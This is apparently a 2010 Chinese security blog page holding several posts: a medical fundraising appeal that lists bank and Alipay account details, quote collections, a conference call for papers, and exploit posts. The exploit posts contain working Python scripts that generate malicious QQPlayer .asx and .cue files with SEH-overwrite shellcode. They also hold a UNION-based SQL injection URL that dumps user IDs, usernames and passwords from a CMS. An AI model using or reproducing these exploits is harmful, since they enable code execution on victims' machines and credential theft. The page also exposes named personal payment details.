黑海洋's BLOG

[紧急]管理员A-new(牛牧原)突发疾病,希望大家伸出援助之手!

admin@upx8.com(admin) — Mon,26 Jul 2010 17:30:37 +0800

[紧急]管理员A-new(牛牧原)突发疾病,希望大家伸出援助之手!
下面是来自金山的朋友提供的消息,A-new就是文中所说的牛牧原,正是吾爱破解论坛的创始人之一,我们都叫他A哥,硕士刚毕业的A哥刚入职金山不久,由于突发脑出血，需要很大一笔钱做手术。中午收到消息就赶紧给牛牧原的妈妈打去了电话询问情况,现在刚做完一次手术,现在还在深度昏迷中,希望论坛的各位朋友能够伸出援助之手,有钱的捐钱,没钱的祈福,帮A-new度过难关,好人一生平安。

目前论坛组织募捐资金,所有捐的的钱将转交给Squn和roxiel,他们将前往医院转交给牛牧原的妈妈,并带去我们最真挚的祝福,希望他能早日康复!

所有捐款的朋友请留下自己的论坛ID和说明,事后我们将用论坛的小小荣誉回馈大家,再次感谢各位朋友,好人一生平安!

捐款卡号:
工商银行卡号:9558 8203 0200 3958911 姓名:徐超开行地址:天津工行唐家口支行

支付宝帐号:68857640@qq.com 姓名:邱枫

牛牧原，7月6日来珠海金山KIS报到工作的小伙子，研究生毕业，聪明优秀，拥有着美好的前程。

昨天上午，牛牧原在宿舍突发脑出血，经120急救中心送往中医院紧急抢救，中午12点，医生开具“病危通知书”，并要求转至珠海市人民医院神经外科。晚10:40分，进行脑手术，经确认，为脑血管动脉瘤，因天生细胞壁比较薄，导致爆裂出血。今天凌晨4:15分手术完成，直接进入ICU观察室。

从进入医院的那一刻起，这个小伙子牧原就一直保持着非常强的求生意识，医生通知我们，每隔一个小时就唤醒他一次，以防他的病情有进一步恶化的可能，每一次呼唤，他都用尽全力的在应着我们。八点多的时候，当我们照常呼唤牧原，他没有醒来。从河南平顶山老家一路奔波赶来的父母，在手术前，没有听到儿子的呼唤。

昨天深夜，牛妈妈在哭泣的时候，牛爸爸一直保持着平稳的情绪，他知道，他是一家之主，只是有些无奈的说，没想到，我这辈子第一次坐飞机，是因为这个，哪曾想过啊？！

牧原刚来公司，社保和商业保险要到八月才生效，就是在这个时候，遇到了这场对他一家人来说最大的灾难。

我忘不了牛妈妈的那句话，我们已经打电话回老家准备卖房子了，可是这么急，亲戚说一时也找不到人买，然后声音就被哭泣淹没......

我更忘不了牛爸爸别过身子无声抽泣的样子，这个一辈子没读过什么书的老人，养出了一个博士、一个研究生、一个本科生三个优秀的儿子，他一辈子不求人，靠自己的努力养活孩子读书，却在听到我说，要组织同事捐款的瞬间，抽泣起来！

本来，这一对老人，将迎来人生中最幸福的晚年，大儿子博士毕业，牧原放弃了在读的博一，也找到了自己喜欢的工作，老三本科毕业，也刚刚在北京找到一家不错的工作。可是就是这突发的病，医生说全部手术费用要二十几万，现在每天ICU重症监护的费用是4000元/天。这对于含辛茹苦供养孩子读书的家庭，是怎样一个负担？！

我找出牧原刚入职时候的照片，那个鲜活帅气的小伙子和昨天我见到的、剃光了头发的，病床上的他，判若两人。我想，金山是个有爱的大家庭，那个也许你还不熟悉的小伙子--我们的同事牛牧原，需要你的帮助，也许我们每个人只需要付出一百元，那一千人的力量就是十万元！而这份爱的力量，将超越物质金钱的意义，带给牧原和他家人莫大的帮助！

http://www.52pojie.net/thread-53986-1-1.html

QQPlayer asx文件处理缓冲区溢出漏洞

admin@upx8.com(admin) — Thu,22 Jul 2010 20:26:51 +0800

Title: QQPlayer asx File Processing Buffer Overflow Exploit

Author: Li Qingshan of Information Security Engineering Center,School of Software and Microelectronics,Peking University

Vendor: www.qq.com

Platform: Windows XPSP3 Chinese Simplified

Test: QQPlayer 2.3.696.400

Vulnerable: QQPlayer<=2.3.696.400p1

Payload = calc

复制内容到剪贴板程序代码

head ='''



mms://site.com/ach/music/smpl/LACA-05928-002-tes_'''

junk = "A" * 1975  #English XP SP3 users, try 1984 bytes instead

nseh ="\x42\x61\x21\x61"

seh  ="\xa9\x9e\x41\x00"

adjust="\x30\x83\xc0\x0c"

shellcode=("PYIIIIIIIIIIQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0BBXP8ACJJIKLM8LI5PUPUPSPMYZEV"

           "QN2BDLKPRVPLKQB4LLK0RR4LKSBWX4ONW1ZWVFQKO6QO0NLWL3QSLS26L7PIQ8ODM5QIWKRZPPRQGL"

           "KQB4PLKPB7L5QXPLKQP2XK5IP44QZ5QXPPPLKQX4XLKQHGPUQN3KSGLQYLKP4LKUQ9FFQKOVQO0NL9"

           "QXODM5QYWFXKPD5JT4C3MZXWK3MWTT5KRPXLKQHWTEQ8SCVLKTLPKLKQH5LEQN3LKS4LKC1XPMY1TW"

           "TGT1KQKSQ0YPZ0QKOKP0XQOQJLKTRJKMVQMCZUQLMLEOIUPUPC0PPRHP1LKROLGKON5OKZPNUORF6R"

           "HOVLUOMMMKOIE7LC6SLUZMPKKM0BU5UOKQWB32R2ORJ5PPSKOHUE3512LSS6N3U2X3UUPDJA")

junk_="R"*8000

foot ='''_playlis.wma"/>



'''

payload=head+junk+nseh+seh+adjust+shellcode+junk_+foot



fobj = open("poc.asx","w")

fobj.write(payload)

fobj.close()

QQPlayerCUE文件缓冲区溢出漏洞

admin@upx8.com(admin) — Thu,22 Jul 2010 20:23:42 +0800

Title: QQPlayer cue File Buffer Overflow Exploit

Author: Lufeng Li of Neusoft Corporation

Vendor: www.qq.com

Platform: Windows XPSP3 Chinese Simplified

Tested: QQPlayer 2.3.696.400

Vulnerable: QQPlayer<=2.3.696.400p1

复制内容到剪贴板程序代码

head = '''FILE "'''

junk = "A" * 780

nseh ="\x42\x61\x21\x61"

seh  ="\xa9\x9e\x41\x00"

adjust="\x32\x42\x61\x33\xca\x83\xc0\x10"

shellcode=("hffffk4diFkTpj02Tpk0T0AuEE2C4s4o0t0w174t0c7L0T0V7L2z1l131o2q1k2D1l081o"

           "0v1o0a7O2r0T3w3e1P0a7o0a3Y3K0l3w038N5L0c5p8K354q2j8N5O00PYVTX10X41PZ41"

           "H4A4I1TA71TADVTZ32PZNBFZDQC02DQD0D13DJE2C5CJO1E0G1I4T1R2M0T1V7L1TKL2CK"

           "NK0KN2EKL08KN1FKO1Q7LML2N3W46607K7N684H310I9W025DOL1S905A4D802Z5DOO01")

junk_="R"*8000

foot ='''.avi" VIDEO'''+"\x0a"'''TRACK 02 MODE1/8888'''+"\x0a"+"INDEX 08 08:08:08"

payload=head+junk+nseh+seh+adjust+shellcode+junk_+foot



fobj = open("poc.cue","w")

fobj.write(payload)

QQ防护盾1.7

admin@upx8.com(admin) — Mon,19 Jul 2010 23:56:45 +0800

顾名思义，上图

CF7.2 外挂内部版

admin@upx8.com(admin) — Tue,13 Jul 2010 00:58:03 +0800

上星期在家无聊跟朋友玩玩，去网上下的那个大飞广告太多，就自己乱搞搞了一个玩玩.这个就不公布了，公布就失效了。

经典哲理

admin@upx8.com(admin) — Sat,26 Jun 2010 16:20:13 +0800

1、人之所以痛苦，在于追求错误的东西。

2、与其说是别人让你痛苦，不如说自己的修养不够。

3、如果你不给自己烦恼，别人也永远不可能给你烦恼。因为你自己的内心，你放不下。

4、好好的管教你自己，不要管别人。

5、不宽恕众生，不原谅众生，是苦了你自己。

6、别说别人可怜，自己更可怜，自己修行又如何？自己又懂得人生多少？

7、福报不够的人，就会常常听到是非；福报够的人，从来就没听到过是非。

8、你永远要感谢给你逆境的众生。

9、你永远要宽恕众生，不论他有多坏，甚至他伤害过你，你一定要放下，才能得到真正的快乐。

10、这个世界本来就是痛苦的，没有例外的。

12、认识自己，降伏自己，改变自己，才能改变别人。

13、不要浪费你的生命，在你一定会后悔的地方上。

14、你什么时候放下，什么时候就没有烦恼。

15、每一种创伤，都是一种成熟。

16、当你知道迷惑时，并不可怜，当你不知道迷惑时，才是最可怜的。

17、狂妄的人有救，自卑的人没有救。

18、你不要一直不满人家，你应该一直检讨自己才对。不满人家，是苦了你自己。

19、你要包容那些意见跟你不同的人，这样子日子比较好过。你要是一直想改变他，那样子你会很痛苦。要学学怎样忍受他才是。你要学学怎样包容他才是。

20、承认自己的伟大，就是认同自己的愚疑。

22、心中装满着自己的看法与想法的人，永远听不见别人的心声。

23、毁灭人只要一句话，培植一个人却要千句话，请你多口下留情。

24、当你劝告别人时，若不顾及别人的自尊心，那么再好的言语都没有用的。

25、不要在你的智慧中夹杂着傲慢。不要使你的谦虚心缺乏智慧。

26、根本不必回头去看咒骂你的人是谁？如果有一条疯狗咬你一口，难道你也要趴下去反咬他一口吗？

27、忌妒别人，不会给自己增加任何的好处。忌妒别人，也不可能减少别人的成就。

28、永远不要浪费你的一分一秒，去想任何你不喜欢的人。

29、多少人要离开这个世间时，都会说出同一句话，这世界真是无奈与凄凉啊！

30、恋爱不是慈善事业，不能随便施舍的。感情是没有公式，没有原则，没有道理可循的。可是人们至死都还在执著与追求。

22、心中装满着自己的看法与想法的人，永远听不见别人的心声。

23、毁灭人只要一句话，培植一个人却要千句话，请你多口下留情。

24、当你劝告别人时，若不顾及别人的自尊心，那么再好的言语都没有用的。

25、不要在你的智慧中夹杂着傲慢。不要使你的谦虚心缺乏智慧。

26、根本不必回头去看咒骂你的人是谁？如果有一条疯狗咬你一口，难道你也要趴下去反咬他一口吗？

27、忌妒别人，不会给自己增加任何的好处。忌妒别人，也不可能减少别人的成就。

28、永远不要浪费你的一分一秒，去想任何你不喜欢的人。

29、多少人要离开这个世间时，都会说出同一句话，这世界真是无奈与凄凉啊！

30、恋爱不是慈善事业，不能随便施舍的。感情是没有公式，没有原则，没有道理可循的。可是人们至死都还在执著与追求。

42、每一个人都拥有生命，但并非每个人都懂得生命，乃至于珍惜生命。不了解生命的人，生命对他来说，是一种惩罚。

43、自以为拥有财富的人，其实是被财富所拥有。

44、情执是苦恼的原因，放下情执，你才能得到自在。

45、随缘不是得过且过，因循苟且，而是尽人事听天命。

46、不要太肯定自己的看法，这样子比较少后悔。

47、当你对自己诚实的时候，世界上没有人能够欺骗得了你。

48、用伤害别人的手段来掩饰自己缺点的人，是可耻的。

49、内心充满忌妒，心中不坦白，言语不正的人，不能算是一位五官端正的人。

50、多讲点笑话，以幽默的态度处事，这样子日子会好过一点。

52、不要刻意去猜测他人的想法，如果你没有智慧与经验的正确判断，通常都会有错误的。

53、要了解一个人，只需要看他的出发点与目的地是否相同，就可以知道他是否真心的。

54、人生的真理，只是藏在平淡无味之中。

55、不洗澡的人，硬擦香水是不会香的。名声与尊贵，是来自于真才实学的。有德自然香。

56、与其你去排斥它已成的事实，你不如去接受它。

57、逆境是成长必经的过程，能勇于接受逆境的人，生命就会日渐的茁壮。

58、你要感谢告诉你缺点的人。

59、能为别人设想的人，永远不寂寞。

60、如果你能像看别人缺点一样，如此准确般的发现自己的缺点，那么你的生命将会不平凡。

52、不要刻意去猜测他人的想法，如果你没有智慧与经验的正确判断，通常都会有错误的。

53、要了解一个人，只需要看他的出发点与目的地是否相同，就可以知道他是否真心的。

54、人生的真理，只是藏在平淡无味之中。

55、不洗澡的人，硬擦香水是不会香的。名声与尊贵，是来自于真才实学的。有德自然香。

56、与其你去排斥它已成的事实，你不如去接受它。

57、逆境是成长必经的过程，能勇于接受逆境的人，生命就会日渐的茁壮。

58、你要感谢告诉你缺点的人。

59、能为别人设想的人，永远不寂寞。

60、如果你能像看别人缺点一样，如此准确般的发现自己的缺点，那么你的生命将会不平凡。

62、时间总会过去的，让时间流走你的烦恼吧！

63、你硬要把单纯的事情看得很严重，那样子你会很痛苦。

64、永远扭曲别人善意的人，无药可救。

65、人不是坏的，只是习气罢了，每个人都有习气，只是深浅不同罢了。只要他有向善的心，能原谅的就原谅他，不要把他看做是坏人。

66、说一句谎话，要编造十句谎话来弥补，何苦呢？

67、其实爱美的人，只是与自己谈恋爱罢了。

68、世界上没有一个永远不被毁谤的人，也没有一个永远被赞叹的人。当你话多的时候，别人要批评你，当你话少的时候，别人要批评你，当你沈默的时候，别人还是要批评你。在这个世界上，没有一个人不被批评的。

69、夸奖我们，赞叹我们的，这都不是名师。会讲我们，指示我们的，这才是良师，有了他们我们才会进步。

70、你目前所拥有的都将随着你的死亡而成为他人的，那为何不现在就乐施给真正需要的人呢？

72、沈默是毁谤最好的答覆。

73、对人恭敬，就是在庄严你自己。

74、拥有一颗无私的爱心，便拥有了一切。

75、仇恨永远不能化解仇恨，只有宽容才能化解仇恨，这是永恒的至理。

76、你接受比抱怨还要好，对于不可改变的事实，你除了接受以外，没有更好的办法了。

77、不要因为众生的愚疑，而带来了自己的烦恼。不要因为众生的无知，而痛苦了你自己。

78、别人讲我们不好，不用生气、难过。说我们好也不用高兴，这不好中有好，好中有坏，就看你会不会用？

79、当你的错误显露时，可不要发脾气，别以为任性或吵闹，可以隐藏或克服你的缺点。

80、不要常常觉得自己很不幸，世界上比我们痛苦的人还要多。

1.每一个奋发努力的背后都有加倍的赏赐。

2.每一个成功这都有一个开始，勇于开始才能成功

3.每个人都会坚持自己的信念，在别人看来是浪费时间。
4.个人有烦恼是因为记性太好，如果什么都可以忘掉，以后的每一天都会是一个新的开始。
5.让一个人最痛苦的方法是杀掉他最爱的女人。
6.如果你不想被拒绝，最好的方法是先拒绝别人。
7一个人受了挫折或多或少都会找个借口来掩饰自己。
8你越想知道自己是不是忘记反而记得越清楚，当你不能够再拥有的时候，唯一可做的，就是让自己不要忘记。
9任何人都可以变得狠毒，只要你尝试过什么叫忌妒。
10知不知道饮酒和饮水有什么区别？酒越饮越暖，水越喝越寒。
11有时候，耳朵比眼睛还重要，很多东西用耳朵听比用眼睛看好，一个人可以假装开心，但声音就装不了，细心一听就知道了。
12最好的拍档是不该有感情的。
13任何东西都会过期。
14有的人是不适合太接近的。知道反不如不知道。
15做拍档，除了要了解她外，还要给机会让她了解你。
16每天你都会跟许多人擦肩而过，有些人可能会变成朋友，有些变成知已，所以我从不放过可以跟大家磨擦的机会。
17“你知不知道有一种鸟没有脚的？他的一生只能在天上飞来飞去。一辈子只能落地一次，那就是他死的时候。”
18“每天你都会和许多人擦身而过，却不一定发生什么事情。当时那个女孩子离我只有零点零一厘米，五分钟之后，我将会爱上她。”
“我以为有一种人是永远不会嫉妒的，因为他太骄傲。”
“醉生梦死不过是她跟我开的一个玩笑。有些事情你越想忘记，就会记得越牢。当有些事情你无法得到时，你唯一能做的，就是不要忘记。”
“要想不被人拒绝，最好的办法是先去拒绝别人。”
“每次他都会回来跟我说，‘让我们重新开始……’”
“我以为我和他不一样，原来寂寞的时候，每个人都一样。”
《阿飞正传》
我听别人说这世界上有一种鸟是没有脚的，它只能够一直的飞呀飞呀，
飞累了就在风里面睡觉，这种鸟一辈子只能下地一次，那一次就是它死亡的时候。
一九六零年四月十六号下午三点之前的一分钟你和我在一起，因为你我会记住这一分钟。
从现在开始我们就是一分钟的朋友，这是事实，你改变不了，因为已经过去了。
我不知道他有没有因为我而记住那一分钟，但我一直都记住这个人。
我终于来到亲生母亲的家了，但是她不肯见我，佣人说她已经不住这里了。
当我离开这房子的时候，我知道身后有一双眼睛盯着我，但我是一定不会回头的。
我只不过想见见她，看看她的样子，既然她不给我机会，我也一定不会给她机会。
以前我以为有一种鸟一开始飞就会，飞到死亡的那一天才落地。
其实它什么地方也没去过，那鸟一开始就已经死了。
我曾经说过不到最后一刻我也不会知道最喜欢的女人是谁，不知道她现在在干什么呢？
天开始亮了，今天的天气看上去不错，不知道今天的日落会是怎么样的呢？
《东邪西毒》
很多年之后,我有个绰号叫做西毒,任何人都可以变得狠毒,只要你尝试过甚么叫忌炉,我不会介意他人怎样看我,我只不过不想别人比我更开心。
看来你的年纪也有四十出头了，这四十多年来，总有些事你是不愿再提，或是有些人你不想再见，有的人曾经对不起你，也许你想过要杀了他们，但是你不敢。哈，又或者你觉得不值，其实杀人，很容易。我有个朋友，他的武功非常好，不过最近生活有点困难，只要你随便给他一点银两，他一定可以帮你杀了那个人，你尽管考虑一下。
其实杀一个不是很容易，不过为了生活,很多人都会冒这个险。
我只希望他说一句话，他都不肯说，他太自信了，以为我一定会嫁给他，谁知道我嫁给了他哥哥。在我们结婚那天，他要我跟他走，我没答应。
为什么要到失去的时候才去争取？既然是这样，我不会让他得到。
以前我认为那句话很重要，因为我觉得有些话说出来就是一生一世，现在想一想，说不说也没有什么分别，有些事会变的。

XCon2010 安全焦点信息安全技术峰会

admin@upx8.com(admin) — Mon,14 Jun 2010 17:18:53 +0800

中国，北京，2010年8月4~5日 (http://xcon.xfocus.net)

      XCon 秉承一贯的严谨求实作风竭诚欢迎热爱信息安全技术的人员积极投稿，参加会议，共享精彩盛会。

参加会议对象:
      任何热爱信息安全的人士，包括如信息安全专家，信息安全爱好者，网络
      管理工程师，网络安全顾问， CIO，黑客技术发烧友等。

会议地点: 北京歌华开元大酒店 ( http://www.kaiyuanhotels.com/Hotel/Default.aspx?City=PEK&HotelCode=KYBJGH )

征文范围 (不限于所列方向):
   ---新领域安全
      - Vista 安全 / Windows & 安全
      - Web 2.0安全技术
      - 3G/4G网络，TD-SCDMA网络安
      - 移动手持设备安全 Symbian / IPhone / Android / Windows Mobile 安全
      - 银行金融安全
      - 企业信息系统安全
      - 虚拟化技术
      - 最新漏洞挖掘技术

    --- 应用安全
      - Web 应用程序弱点研究
      - 应用程序反向工程和相关自动工具
      - 数据库安全和攻击
      - 协议安全利用
      - 高级木马、蠕虫、后门技术
      - 加密和破解技术
      - 路由器设备安全

   --- 入侵检测/取证分析
      - 文件系统分析和恢复
      - 实时结构数据恢复
      - 反向工程 (恶意代码分析技术，弱点研究)
      - 入侵检测和反检测技术
      - 流量分析

   --- 无线和VoIP 安全
      - 802.11x, CDPD, Bluetooth, WAP/TD-SCDMA, GSM, SMS
      - PDA 和移动电话协议分析
      - Palm, Pocket Pc安全
      - Wireless 网关
      - VoIP 安全和弱点分析
      - WLANs 加固、弱点分析

   ---P2P 技术
      - 即时通信工具（QQ，MSN, Skype, ICQ 等）
      - P2P 应用（BT，Emule，迅雷等）

征文提交事宜：

提交的征文必须包含如下信息:
    1) 对要作演讲的题材进行简单的描述及说明之前是否发布，发布的范围。
    2) 对演讲者自身和工作经历描述。
    3) 演讲者联系信息：全名，别名，国籍，网络昵称，e-mail, 电话，传真，
        目前工作地点和相关公司，任何即时聊天的方式(QQ，MSN, ICQ, YM, AIM 或者其他).
    4) 演讲过程中所需细节:
        - 演讲需要多长时间
        - 是否发布新的工具
        - 是否发布新漏洞
        - 是否需要发布新的Exploit 代码
    5) 所有征文必须包含PPT(演讲使用)和WORD(细节描述)，可以以MS
        Office , OpenOffice 格式提交。

    所有征文通过cfp@huayongxingan.com提交，供XCon组织者筛选，征文投稿最后截
止日期定于2010年7月1日，最后确认是否收录时间为2010年7月10日，投
稿自收到之日起5个工作日内，将给出准确的答复，无论您的议题是否被收
录，我们都将会通过您留下的联系方式告知您。

征文相关重要日期:
  *最后提交日期 – 2010年7月1日
  *最后确认通知 – 2010年7月10日

演讲者待遇:
      如果您的稿件被我们XCon收录，意味着您将在XCon会议上单独发表演讲，
XCon 将会提供演讲者包含
      - 往返程经济舱飞机票，限一人(外宾旅费封顶1200USD)
      - 2 天会议期间的酒店住宿费用
      - 2 天会议期间的早餐、中餐、及晚餐
      - 被邀请参加庆祝酒会
      - 并且我们将会组织演讲者在会后的一天游览中国北京的一些名胜古迹，品尝
        中国的风味特色食品。
      - 可参与抽奖活动
注：
      - 演讲者必须提供相关票据或凭证。
      - 所有相关会议解释权归XCon会议组织者所有。

关于会议更多信息、细节及咨询，可以联系至信给如下信箱:xcon@xfocus.org，xcon@huayongxingan.com
或专门的XCon2010会议组织者MSN: xfocusxcon@hotmail.com，电话：086-010-62029792

申请参会:

      您可以通过XCon网站(http://xcon.xfocus.net)注册或直接联系我们组织者(联系方式见上)申请参
加会议，我们将给根据预定申请时间的早晚提供不同的折扣。参会者食宿自理，XCon将为参会者预定酒店
等服务。

其他信息：

      你可以浏览http://xcon.xfocus.org/查看演讲者信息、会议安排、XCon
之前会议的相关文档和信息，任何有关XCon的会议信息，将在XCon和XFocus
站点发布，请大家密切关注。

          非常感谢您对XCon 的支持！

联想“闪屏门”

admin@upx8.com(admin) — Sun,13 Jun 2010 10:57:23 +0800

今天我的Thinkpad屏幕上出现了一条绿线屏幕时不时的上下抖动.

我上网一看，原来是传说中的联想“闪屏门”杯具的我、杯具的IBM、杯具的联想。

还好在保修期内,他们应该会给我换吧。

有这种情况的朋友留言.

“69圣战”脑残回来

admin@upx8.com(admin) — Wed,09 Jun 2010 22:53:48 +0800

圣战口号：“脑残不死，圣战不休！”，为2010年中国网络文化冲突之大事。我也凑热闹！人才往往都是被欺骗的

Delivering Digital Media CMS SQL 注入漏洞

admin@upx8.com(admin) — Wed,02 Jun 2010 10:23:30 +0800

[ Vulnerable File ]



http://server/[PATH]/index.php?edicion_id=1&categoria_id=1&origen_id=1&articulo_id=[N.A.S.T ]



http://server/index.php?edicion_id=1&categoria_id=1&origen_id=1&articulo_id=[N.A.S.T ]



[ Exploit ]



http://server/index.php?edicion_id=1&categoria_id=1&origen_id=1&articulo_id=-1+union+select+1,2,3,4,GROUP_concat(user_id,0x3a,username,0x3a,password),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+sys_user--



[  GReets ]



[+] :claw ,harD , exploit-db.com , ALL HACKERS MUSLIMS





EXAMPL:http://[site]/sitio/index.php?edicion_id=1&categoria_id=1&origen_id=1&articulo_id=-1+union+select+1,2,3,4,GROUP_concat%28user_id,0x3a,username,0x3a,password%29,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+sys_user--



       http://[site]/sitio/index.php?edicion_id=1&categoria_id=1&origen_id=1&articulo_id=-1+union+select+1,2,3,4,GROUP_concat%28user_id,0x3a,username,0x3a,password%29,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+sys_user--